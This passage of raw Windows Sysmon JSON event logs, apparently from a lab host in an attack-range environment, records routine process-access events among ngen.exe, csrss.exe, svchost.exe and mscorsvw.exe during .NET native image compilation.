C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.632","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00101C930B00}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7248,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.632\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00101C930B00}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.632","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00101C930B00}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7249,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.648\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-0010EEB10C00}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.648","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-0010EEB10C00}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7250,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.695\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-221B-5F25-0000-00104AF50A00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.695","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-221B-5F25-0000-00104AF50A00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7251,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.695\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221B-5F25-0000-00104AF50A00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.695","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221B-5F25-0000-00104AF50A00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7252,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.710\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001022B60C00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.710","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001022B60C00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7253,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.851\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00100B400B00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.851","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00100B400B00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7254,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.851\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00100B400B00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.851","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00100B400B00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7255,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.851\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00100B400B00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 